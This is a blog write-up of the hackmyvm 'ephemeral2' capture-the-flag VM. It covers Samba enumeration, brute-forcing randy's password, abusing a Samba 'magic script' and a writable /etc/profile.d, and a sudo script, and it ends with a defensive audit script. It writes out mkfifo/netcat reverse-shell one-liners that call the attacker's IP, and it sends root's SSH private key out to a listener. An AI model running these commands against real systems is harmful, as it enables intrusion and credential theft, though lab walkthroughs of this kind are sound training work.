
Hackmyvm – ephemeral2

The free CTF challenge website hackmyvm.eu has another medium-level VM called 'ephemeral2' for us to download, enumerate and get some flags from. In this write-up I will try to describe my method and thought process on how I completed the hackmyvm ephemeral2 CTF challenge.


Setup for hackmyvm ephemeral2

The vm can be downloaded from hackmyvm.eu as an OVA file and imported into Oracle VirtualBox.

My network:

  • 192.168.186.150 – This is my BlackArch enumeration system.
  • 192.168.186.10 – This is the ephemeral2 vm.

For enumeration of the hackmyvm ephemeral2 challenge I will be using the BlackArch system build that I created in a previous blog post. You can use Kali, BlackArch, Parrot or just a standard Linux install to proceed.

Enumeration

nmap

The first command to run is nmap, for network service enumeration.

Only 4 ports open

There are only 4 ports open:

  • 80 (http)
  • 22 (ssh)
  • 139 and 445 (smb)

Running a web fuzzer against the website found nothing of interest, so let's dig deeper into the Samba side and use the command below to see if we can get any user information.

Samba

enum4linux -U 192.168.186.10

After a minute of running, we get a username:

Account: randy    Name: randy 

Now to get the share list:

 enum4linux -S 192.168.186.10

This results in a list of the directories shared by Samba. Only one is of interest, and it is shown below.

Sharename       Type      Comment
---------       ----      ----
SYSADMIN        Disk

But a username and a share name are not enough to mount the remote file system (SYSADMIN), so I have to use smbrute to try and get the password. I used the rockyou.txt list and it took a long time, so be prepared to wait. Also make sure you have smbclient installed before you run the smbrute script.

The script smbrute.py needs three things to run: a file with the usernames, a file with the passwords, and a target. So use a file with the single username "randy" and the rockyou.txt password list from GitHub. If rockyou.txt is too big you will have to break it up. Hint: the password is in the top 2000 entries of this file.

python3 ./smbrute.py -t 192.168.186.10 -u /tmp/users -p /opt/rockyou.txt
smbrute.py

SMB Mount

Eventually you will get the password; just wait. Once you have the password you can mount the share.

 sudo mount -t cifs -o username=randy //192.168.186.10/SYSADMIN /mnt
smb mount

There are some interesting files; take a look at them. The one I am most interested in is the smb.conf file, and randy's share configuration in it.

randys config

Reverse Shell

Look up what the Samba "magic script" option does; it's really interesting. After you have looked that up, create a reverse shell script:

vim /tmp/rev.sh

Put in the below contents.

#!/bin/bash

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.186.150 4444 >/tmp/f

Now, in another window on the enumeration system, open a netcat listener to capture the shell.

nc -vlnp 4444

Then copy your reverse shell script into the mount. If you are not root, be sure to use sudo.

sudo cp /tmp/rev.sh /mnt/smbscript.elf
Terminal 1

And you should get a shell on the netcat Terminal window.

Terminal 2

More Enumeration

After some poking around you can find two things:

  • /etc/profile.d is writable.
  • There is a cron job that runs ssh as the user ralph every minute (see /etc/crontab).
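Both weaknesses used in this walkthrough (a writable Samba share with "magic script" set in smb.conf, and a writable /etc/profile.d whose scripts run at every login) are configuration faults that a defender can find with a simple audit. The script below is an added example, not code from the write-up or from the Samba project. It parses a constructed smb.conf sample (modelled on the kind of share described above) and flags shares with magic script, writable or guest access, and it flags group- or world-writable entries in a profile.d directory; the mode map is a constructed sample too, and collect_modes() shows how to build a real one with os.lstat.

```python
"""Audit helpers for two misconfigurations: Samba 'magic script' on a
writable share, and a writable /etc/profile.d. Added example, not part of
the hackmyvm write-up or of Samba itself."""
import configparser
import os
import stat
from typing import Dict, List

# Constructed sample smb.conf (not the VM's real file).
SAMPLE_SMB_CONF = """
[global]
   workgroup = WORKGROUP
   server string = Samba Server

[SYSADMIN]
   path = /srv/sysadmin
   valid users = randy
   writable = yes
   magic script = smbscript.elf

[public]
   path = /srv/public
   read only = yes
"""

# Constructed sample of path -> st_mode, as os.lstat() would return it.
SAMPLE_PROFILE_D_MODES = {
    "/etc/profile.d": stat.S_IFDIR | 0o777,
    "/etc/profile.d/shell.sh": stat.S_IFREG | 0o664,
    "/etc/profile.d/vte.sh": stat.S_IFREG | 0o644,
}

TRUE_VALUES = {"yes", "true", "1"}


def parse_smb_conf(text: str) -> configparser.ConfigParser:
    """smb.conf is INI-like. Leading indentation is stripped so configparser does
    not treat indented lines as value continuations; interpolation is off because
    Samba values legitimately contain '%' substitutions."""
    flat = "\n".join(line.strip() for line in text.splitlines())
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(flat)
    return cp


def share_is_writable(sec: configparser.SectionProxy) -> bool:
    """'writable'/'writeable'/'write ok' are synonyms for 'read only = no';
    Samba's default is read only = yes."""
    for key in ("writable", "writeable", "write ok"):
        if key in sec:
            return sec[key].strip().lower() in TRUE_VALUES
    return sec.get("read only", "yes").strip().lower() not in TRUE_VALUES


def audit_smb_conf(text: str) -> List[str]:
    """Return one finding string per risky share setting."""
    cp = parse_smb_conf(text)
    findings = []
    for share in cp.sections():
        if share.lower() == "global":
            continue
        sec = cp[share]
        magic = sec.get("magic script")
        if magic:
            # smbd executes a file of this name when a client closes it on the share.
            findings.append(f"{share}: 'magic script' = {magic!r}; server executes "
                            f"any uploaded file with that name")
        if share_is_writable(sec):
            findings.append(f"{share}: share is writable")
        if sec.get("guest ok", "no").strip().lower() in TRUE_VALUES:
            findings.append(f"{share}: guest access allowed")
    return findings


def profile_d_risks(modes: Dict[str, int]) -> List[str]:
    """Flag directory or scripts that a non-owner can modify; anything placed in
    /etc/profile.d is sourced by every interactive login shell."""
    out = []
    for path, mode in sorted(modes.items()):
        if mode & (stat.S_IWGRP | stat.S_IWOTH):
            who = "world" if mode & stat.S_IWOTH else "group"
            out.append(f"{path}: {who}-writable (mode {stat.S_IMODE(mode):04o})")
    return out


def collect_modes(directory: str) -> Dict[str, int]:
    """Build the path -> st_mode map for a real directory and its direct entries."""
    modes = {directory: os.lstat(directory).st_mode}
    for name in os.listdir(directory):
        p = os.path.join(directory, name)
        modes[p] = os.lstat(p).st_mode
    return modes


if __name__ == "__main__":
    for f in audit_smb_conf(SAMPLE_SMB_CONF) + profile_d_risks(SAMPLE_PROFILE_D_MODES):
        print(f)
```

On a live host you would feed the real file with `audit_smb_conf(open("/etc/samba/smb.conf").read())` and `profile_d_risks(collect_modes("/etc/profile.d"))`; the fix for each finding is the obvious one (drop magic script, make the share read-only or restrict valid users, and restore 0755 root-owned permissions on /etc/profile.d and 0644 on its scripts).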

Another Reverse Shell

All scripts in /etc/profile.d are run when someone logs in, so when the cron job runs ssh as the user "ralph" it can be used to spawn another reverse shell. Modify the reverse shell script we created earlier to look like the below.

#!/bin/bash

rm /tmp/k;mkfifo /tmp/k;cat /tmp/k|sh -i 2>&1|nc 192.168.186.150 4445 >/tmp/k

Put it into "/etc/profile.d/shell.sh" on the host. Then, in another window on the enumeration host, run another netcat listener.

nc -vlnp 4445

and wait...

ralphs shell

Now we have another shell, this time as the user “ralph”.

Stabilize the shell.

(screenshot: stabilizing the shell)

Sudo

Take a look at the output of sudo -l.

sudo

This script does something interesting to the files input into it. Try to figure it out.

Netcat One More time

On yet another terminal on your enumeration host, run netcat again.

nc -vlnp 4446

Now run the sudo command:

sudo /usr/bin/python3 /home/ralph/getfile.py

When the "File path" prompt pops up, enter:

File path: /root/.ssh/id_rsa

When the IP prompt comes up, enter the IP of your enumeration host and the port you ran netcat on.

IP address: 192.168.186.150:4446

And all going well, the root ssh private key will pop up on the netcat window.

Root Shell

Save it somewhere on the ephemeral system (I used /tmp/key.pem), set the permissions to 600 and use the commands below to get onto the system as root.

vi /tmp/key.pem
chmod 600 /tmp/key.pem
ssh -i /tmp/key.pem root@localhost
root access

Wrap-Up

I found this room challenging and engaging. Thanks to rpj7 for pointing out that running the same command more than once can yield different results.

Published in: CTF, hackmyvm.eu
